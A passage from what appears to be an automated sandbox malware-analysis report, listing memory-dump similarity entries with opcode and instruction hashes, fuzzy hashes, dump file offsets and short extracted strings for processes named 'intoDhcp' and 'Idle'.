                  • Instruction ID: aff08f8189602897cabc7ea848cd11ac56180d199e2ffaa4005a81f7d89233cd
                  • Opcode Fuzzy Hash: 3fcc2c6b7edf4f4d4bcf7401431c76a8ea89127d9189c586a4654078dc9ee77d
                  • Instruction Fuzzy Hash: A201AD30A09B0E8AEB59EBA4C0286B973A0FF09305F1008BEE41EC21E4CF75A284C600
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8160bd0a509a1bd0c0558b8a6aff928c6142a3029ce1501679f35c174c3c7250
                  • Instruction ID: 7a5dc19bb75f60857ee39450c56a85434441f4b3a978e89c09e530424d9ddd37
                  • Opcode Fuzzy Hash: 8160bd0a509a1bd0c0558b8a6aff928c6142a3029ce1501679f35c174c3c7250
                  • Instruction Fuzzy Hash: 6E018121A1F38E4FD362ABA498A51E93BB0AF43314F4B05F7D0C9C60B3D96995488351
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eeeccbaec99bbf7fcd4307ce964550f4f2e77ed739cfd209ec8f7d755d63e134
                  • Instruction ID: 62febb663c3a87fca44421adda7508274f9889dea85ef3867508e6275a24786a
                  • Opcode Fuzzy Hash: eeeccbaec99bbf7fcd4307ce964550f4f2e77ed739cfd209ec8f7d755d63e134
                  • Instruction Fuzzy Hash: 70F0A970F1A54F4AEF649BA888682FA77E4EF6B204F01043AF49DC20E1DE7456448240
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00a22a7fcc181ec275077399baa949711d0edf00d418930f026b4f3dab33b499
                  • Instruction ID: acb23ad5715f689e05a267c10e5e7e406cb459e8037dff4acef0aa71c5c50e3a
                  • Opcode Fuzzy Hash: 00a22a7fcc181ec275077399baa949711d0edf00d418930f026b4f3dab33b499
                  • Instruction Fuzzy Hash: 14F0A930A5560E5BDB98EFB4C4B55BA77A0FF04318F11147DD41ED20E1DE75A250C640
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bd353f10bbf2ae7a7c1925e1c484b674fc9516bebfad8b96b43cd7f88bbdc7c7
                  • Instruction ID: cf537b70505ea38a0f3680d7348dfaa483dc2b9bb3b772d815a647a87776e3c4
                  • Opcode Fuzzy Hash: bd353f10bbf2ae7a7c1925e1c484b674fc9516bebfad8b96b43cd7f88bbdc7c7
                  • Instruction Fuzzy Hash: DCF0E130A1560E8FDBA5EFA8C4556BE77E0FF14345F50057EE819C2560DB78A6908B80
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8263c2e7f8d9968436d36cf40347db239cf40cbf622df61a790a18a98428e3c1
                  • Instruction ID: 928302e9b3ba51749f8b35cc7d0728277710ab1c2b84b19ff1aedf31911e8489
                  • Opcode Fuzzy Hash: 8263c2e7f8d9968436d36cf40347db239cf40cbf622df61a790a18a98428e3c1
                  • Instruction Fuzzy Hash: FE01DB3090E78D4FDB55EF6488691B93FB0FF1A300F4601BBD458C61A2DB785644C740
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dad3b882977db8d8c915b07ab60019877fc714fa8732a5984fdc30d5ef6690bd
                  • Instruction ID: 9cf2f52c041d998eb595e51efc6f2499b04961ed2b7a41874e9e6276ed7c0412
                  • Opcode Fuzzy Hash: dad3b882977db8d8c915b07ab60019877fc714fa8732a5984fdc30d5ef6690bd
                  • Instruction Fuzzy Hash: D0011D30F0560E8BEB60EB58C890AEEB3B1EB55311F1181B6D419E7294DE75AE448F84
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bb11d177a6c9246dc4f8574ff7f0509c8afc3f555663255bcc2fdaf57a418082
                  • Instruction ID: 94221723537326b479296f3ec7e53d8d9e544236aca7b2ed7e7e2c4256520b7b
                  • Opcode Fuzzy Hash: bb11d177a6c9246dc4f8574ff7f0509c8afc3f555663255bcc2fdaf57a418082
                  • Instruction Fuzzy Hash: 3C017170E0961E8FDB24DF90C490AFEB3B1EF55300F604676C409A2295DF78AA85CB80
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction ID: e9ded1e7a39c2288d19f58994c3d64cc1434d502ad49feb5176d5f7f83747c58
                  • Opcode Fuzzy Hash: edeb43ee2dcfded34c248829dea14306b93ef9ce0b6401a423bba9f45534d329
                  • Instruction Fuzzy Hash: 15F0963490E38D8FD76A9F7088251A93F60BF56201F4604FAE449C61F2DB78D558C701
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction ID: 45db22eca49bf6d55f29746af9659d65589cf408075368fb500bfbacb40a3961
                  • Opcode Fuzzy Hash: 71eca0ecacdb48cd29d3f1ea0ff5b80f57e1181e14743b8d5c80e68c8cbc2322
                  • Instruction Fuzzy Hash: DEF0E93090E78D8FE75A5FB088245B937A0BF46305F4604BFF859C60E2DB789658C701
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 44851f4af9fa8afe42ebca63d47ef83fe45d70adcca2f56a0e0456d38491ab11
                  • Instruction ID: 2e023ed8671d73850e91569c32688bf3339ea8f250cbb2e5f28c7107c53f27a8
                  • Opcode Fuzzy Hash: 44851f4af9fa8afe42ebca63d47ef83fe45d70adcca2f56a0e0456d38491ab11
                  • Instruction Fuzzy Hash: 0FF01731E1950E8FDB64EB84C8A1ABD77F4EF1A314F120139D48AE72A5CAB866408B40
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.1771428566.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_7ffd9ba00000_intoDhcp.jbxd
                  Similarity
                  • API ID:
                  • String ID: "$)$Y$e
                  • API String ID: 0-363832505
                  • Opcode ID: 3f72024a90e5f973c0906e77c8559b85306257c15d49ec0271d2685fb2427ecc
                  • Instruction ID: 5fe68fe8948d0c26a4e6d2b9cdfbb3b7391c6e20cd1629f9e445a99b7bcdd93b
                  • Opcode Fuzzy Hash: 3f72024a90e5f973c0906e77c8559b85306257c15d49ec0271d2685fb2427ecc
                  • Instruction Fuzzy Hash: B7211571E0976E8FDB68CF50C8A07E9B7B2AB55301F0001FED449A6291CBB85A84DF01
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: O_H
                  • API String ID: 0-364725170
                  • Opcode ID: 4662ad76dee0659c90cabe7e76604053754928a64c2b9171f86f42a8d6368a43
                  • Instruction ID: 86975e8cc874a8ecfae70c41ab2959f7e43573bf5828feef710352a6955ede07
                  • Opcode Fuzzy Hash: 4662ad76dee0659c90cabe7e76604053754928a64c2b9171f86f42a8d6368a43
                  • Instruction Fuzzy Hash: 0591E072A1D94E8FEB95DB68C8657EC7BE1EF99310F4001BAD00DD72DACBA42945CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: #$O$Q${
                  • API String ID: 0-1370898747
                  • Opcode ID: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction ID: dd738953d8d974184c4ac78a826ffdb5cecd9b1abd8aef51db95765b84d499ff
                  • Opcode Fuzzy Hash: a80e11950b44468270364eb703143c299ad365823b26c34097594ecee175ab0a
                  • Instruction Fuzzy Hash: 8F21D670E1962D8FEB64DF54C8587EABBB2BB54301F0141B9D40DA62A1CB785B80CF44
                  Strings
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >$N$c
                  • API String ID: 0-2822027293
                  • Opcode ID: 516b7117cdcee626ced243f882bb99c68fbe50e35d72cac409685efcab8d0af1
                  • Instruction ID: 9f7f4f0c64d0873f5b51fd4dce69c6eba022c1337f103a8b49ef0d2c2b969fbd
                  • Opcode Fuzzy Hash: 516b7117cdcee626ced243f882bb99c68fbe50e35d72cac409685efcab8d0af1
                  • Instruction Fuzzy Hash: 1B5107B1E14A1D8BDBA8DF18C8947A9B7B1FF58301F0041FAE10DE32A1DA346E818F45
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5238ef13df66ebc209309cd6d48baa228dff8414530668dc20f1910868877fc0
                  • Instruction ID: e96dbf2410899601909cd3362ce563986806a92b1bb12fcfb7538b3591603ae5
                  • Opcode Fuzzy Hash: 5238ef13df66ebc209309cd6d48baa228dff8414530668dc20f1910868877fc0
                  • Instruction Fuzzy Hash: 75E1B231B1955E9FEB68EB6898A4BF8BBA1FF54310F0500BED40ED71D2DE256984CB40
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7df6b096aecd3cef59185426fed356991c135fd48c5453ee701f45b7dede8b39
                  • Instruction ID: bc0bdd5147089c03a7381a2c8dc7d1134e388622f433ef09dcecf267a224da90
                  • Opcode Fuzzy Hash: 7df6b096aecd3cef59185426fed356991c135fd48c5453ee701f45b7dede8b39
                  • Instruction Fuzzy Hash: AAD1B231F1955E9EEB68EB6898A4BF8BBA1FF54310F0500BED40ED71D2DE256984CB40
                  Memory Dump Source
                  • Source File: 00000012.00000002.1842738401.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_18_2_7ffd9b9e0000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d9a3a9ae7f56ede5b9fa50070994ff34c72e41544ccd99e574c1f0c903c69db4
                  • Instruction ID: f8ea3f673465f05827a626866d079a2095746d23a0430bf61ecb16f1986290bf
                  • Opcode Fuzzy Hash: d9a3a9ae7f56ede5b9fa50070994ff34c72e41544ccd99e574c1f0c903c69db4
                  • Instruction Fuzzy Hash: E4C18430B18A1D8FDB98DB58C899AB9B3E2FF55314B1141A9D04EC72A6DE35FC42CB40
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: '$/
                  • API String ID: 0-2558154120
                  • Opcode ID: 6c4b0d95dd148fc3eed9dcc87279b88bbacec95ea84a2a458362b6ead6cef6ff
                  • Instruction ID: 13f8ad4be8bbdb78346c0c3d5750e6b75d3656789e7731f04e099d29ad3eab97
                  • Opcode Fuzzy Hash: 6c4b0d95dd148fc3eed9dcc87279b88bbacec95ea84a2a458362b6ead6cef6ff
                  • Instruction Fuzzy Hash: B421F870E4522E8FEF74DF94C890BEDB7B1AB14300F5140BAD40DA7691EAB86A84DF40
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >f[I
                  • API String ID: 0-732273335
                  • Opcode ID: c50da29da437ea4191ef3a65d3c501669359a4321020514bd052e692125fa0c4
                  • Instruction ID: e477c1f84570665f254bfcd8c28d9876c065ea57f61d05d33494dc388ae84961
                  • Opcode Fuzzy Hash: c50da29da437ea4191ef3a65d3c501669359a4321020514bd052e692125fa0c4
                  • Instruction Fuzzy Hash: 51515923F0F84A4EF725B7ACA8A65FC7B90EF40364B0902B7D498C60E7DD6569498340
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: >f[I
                  • API String ID: 0-732273335
                  • Opcode ID: beed100bfd9cc0ec08547c1c3f0cfa19adf6984090b366ff0b111acfee90684e
                  • Instruction ID: 5f41f8af17d46c58a484499a2f828a571bac3f1eade0e803ff621d7fc5f03302
                  • Opcode Fuzzy Hash: beed100bfd9cc0ec08547c1c3f0cfa19adf6984090b366ff0b111acfee90684e
                  • Instruction Fuzzy Hash: 7A313513F4F98A4EF769A7B858662F87B90EF51320F1901BBD4D8860E7DD646A098341
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: K_H
                  • API String ID: 0-1997722976
                  • Opcode ID: 052777bd6f8f8d27b041a13b149d67d87f0a568dfd4360589601bc6ff59f1873
                  • Instruction ID: 50fb736e5a9f0682ace8877f09435dfa83194227ee0cbbae4876057f38b349c7
                  • Opcode Fuzzy Hash: 052777bd6f8f8d27b041a13b149d67d87f0a568dfd4360589601bc6ff59f1873
                  • Instruction Fuzzy Hash: 03B1D430B09A4A4FD759DF58C0A06A4B7A1FF64300F5941B9C04EC7A9ADB68B951CB80
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: 5faed0c4a04fbba5c87b62cd654c763ea339c67fb41365431d14b708424a0bdf
                  • Instruction ID: 229053320abc4fb959ff3b1ac59dfbabd150e1ad64e0717d3e12c7a1899feef1
                  • Opcode Fuzzy Hash: 5faed0c4a04fbba5c87b62cd654c763ea339c67fb41365431d14b708424a0bdf
                  • Instruction Fuzzy Hash: 5C71EA70E1951D8EEBA4EB98C8A5BACB7B1FF58300F1141B9D40DE7292DE746A848F40
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID: 0-3916222277
                  • Opcode ID: 91486d68160b1032fb00027bdcbb4a133203684f73ff73bfefae136d0666719f
                  • Instruction ID: 6564b4ca96922e28b01ae35add60601b1cab5635ad8315f5245a0d3f1f610212
                  • Opcode Fuzzy Hash: 91486d68160b1032fb00027bdcbb4a133203684f73ff73bfefae136d0666719f
                  • Instruction Fuzzy Hash: CE517D71E0960E8FDB58DBD8C4A55BDB7B1FF64300F1140BAD01AE72EADA792A05CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID: O
                  • API String ID: 0-878818188
                  • Opcode ID: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction ID: 80887e4341fb0ed60d16821b7880db5043c30d381e3ab6412bcbb257490ec277
                  • Opcode Fuzzy Hash: 26991cf8452ccacfe0d90af19eb0937e8cb1b313dabb00877a0059d338a664d8
                  • Instruction Fuzzy Hash: A9D092B0E09A1D8EDBE0DF68C8557AC76F0BF18304F0000A5D54CD2291CB746A818F48
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA18000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA18000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba18000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: acb29d409e68988649a95c85298e44ef2a0c9202577d9ee036fafdbeb3bebd00
                  • Instruction ID: 445d76a0bd3555df708787bbfb3791d93d4451200cdbd0bb5f7341b912a2f832
                  • Opcode Fuzzy Hash: acb29d409e68988649a95c85298e44ef2a0c9202577d9ee036fafdbeb3bebd00
                  • Instruction Fuzzy Hash: 56E16C71E1965D8FEBA8DBA8C4A47B8B7A1FF58301F4540BED05ED72E2CA756940CB00
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bf444868c3ed8ca94ca0827d41d792fe147bc5ffdf11046e3031e8da6423eeb3
                  • Instruction ID: e0a4e3a16d93a1797635592b0b3531dc55f6042a8c896aac10210a6a1f2c235e
                  • Opcode Fuzzy Hash: bf444868c3ed8ca94ca0827d41d792fe147bc5ffdf11046e3031e8da6423eeb3
                  • Instruction Fuzzy Hash: B6D1FE30A0EB0B8FE379DBA8D4A117577E1FF54300B15457ED48EC36A2DEA9B9428B41
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 88c9112a47cec2af3434e1c156de282ec598e002df5c719136f74c7ff8b5967d
                  • Instruction ID: 307c15fae336906206f9f3798ee46f229847bcdd536ef7d1ad24cda6aa871d75
                  • Opcode Fuzzy Hash: 88c9112a47cec2af3434e1c156de282ec598e002df5c719136f74c7ff8b5967d
                  • Instruction Fuzzy Hash: 5ED1C23061974A8FEB69CF88C4E05B537A1FF45300B5545BDD84B8B69BCA78F981CB80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ce69c67c07ee135bae084ec662034af670c6710a274e6de7164319b23b8af77d
                  • Instruction ID: 124bdb54e49d546f5889b50c12efbff185fe12dfd7e1b82d4ca88df0076c76e1
                  • Opcode Fuzzy Hash: ce69c67c07ee135bae084ec662034af670c6710a274e6de7164319b23b8af77d
                  • Instruction Fuzzy Hash: 3DD1B370A4991D8FDBA9EF58C895BE9B7B1FF59300F5100A9D00DE32A5DB75AA80CF40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6be27bf425ce1beb616b18915bb8fe7e5591eb77c706361f25e6c598b443c943
                  • Instruction ID: 25322d30ac2d68166819cf673652a7764b9fcd9dac956c10fe1e0dddca443a29
                  • Opcode Fuzzy Hash: 6be27bf425ce1beb616b18915bb8fe7e5591eb77c706361f25e6c598b443c943
                  • Instruction Fuzzy Hash: E2C1D03061974A8BEB6DCF88C4E05B137A1FF45340B5545BDD88B8B69BCA78F981CB80
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction ID: 8c6e8134cd8cdedcdea09ca9bb411f62f6dc76414da184542e39f81906c9b7d2
                  • Opcode Fuzzy Hash: 595ade9e22e9958f53db2e5926c12f1454d22247ca2e73592fff857b0ad765fd
                  • Instruction Fuzzy Hash: 8791EF31B1DA4D4BDB98DF5C88606B977E2EFA8300B1541BAE45EC32D2DE31AD02C781
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d047558d4cccdbcbab7eabeeebf9a104771a7d6f8bb87c1720b9fbd16d6ed64
                  • Instruction ID: 006f92b1aa3d2432969ed8982c9a46a99d3795b537fc4666cd76bbca3dd8aecf
                  • Opcode Fuzzy Hash: 5d047558d4cccdbcbab7eabeeebf9a104771a7d6f8bb87c1720b9fbd16d6ed64
                  • Instruction Fuzzy Hash: 15712731A0E58D4FEF78DB5888B65B937C0EF44310B1602BDD09EC75B2DE58AA168781
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 831f54c79ad724dfa06e5440135109a9b2be6ee3cf0d6e175ae493452f0704e9
                  • Instruction ID: 8f5ba98b9e5332a8d844bf21cb0fa5c2e65cb42d98d249f56be367e9880eee68
                  • Opcode Fuzzy Hash: 831f54c79ad724dfa06e5440135109a9b2be6ee3cf0d6e175ae493452f0704e9
                  • Instruction Fuzzy Hash: 6471C230E5E64E8EEBA8DBA488646FC7BB0FF54304F5105BAD40ED72E5DE696941C700
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction ID: d72d3660e3d24b4d7d8167cbf63c9e8af5ab906b79f9a79a8d13044e19e9a6c5
                  • Opcode Fuzzy Hash: df2e6942f01d9086e61656e722c1ed930cedd636727208f51d70d33b0132d58e
                  • Instruction Fuzzy Hash: 6A616953B0FACA0FF77157AC68644B53B90EF9275070A92F7D0A8870FBEC55A9058385
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 967796cb0b2ad6b1bf780a218560b5b69c072b49aebe1be75218fe2fe8da66fe
                  • Instruction ID: 9b401348ab364a2817d108d6a66128a401fdaaba0853c7b8b801aae0a3049c3a
                  • Opcode Fuzzy Hash: 967796cb0b2ad6b1bf780a218560b5b69c072b49aebe1be75218fe2fe8da66fe
                  • Instruction Fuzzy Hash: AF81E170A0951D8FDBA9EF58D8A5BA8B3B5FF58700F5000E9E00DD7295CA75AE81CF40
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA21000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba21000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8e55fd0a854aab9c3edcde3d011c3835442aa8b37992276191cce69e5a0c2efb
                  • Instruction ID: 0e5e31e86ad65b88f773dc56f4526ebf07b961d79acf239156ad684b00d6797e
                  • Opcode Fuzzy Hash: 8e55fd0a854aab9c3edcde3d011c3835442aa8b37992276191cce69e5a0c2efb
                  • Instruction Fuzzy Hash: 90518A2770A96A0EE711B7ECFC665FA7BD0EF923B3B050473D548C6052D921A40D87D2
                  Memory Dump Source
                  • Source File: 00000015.00000002.1868371766.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ffd9ba10000_Idle.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a6035936ecc7e992d2d051ffe8b5e94e650c91622a086a3b7b840311bf2a00f2
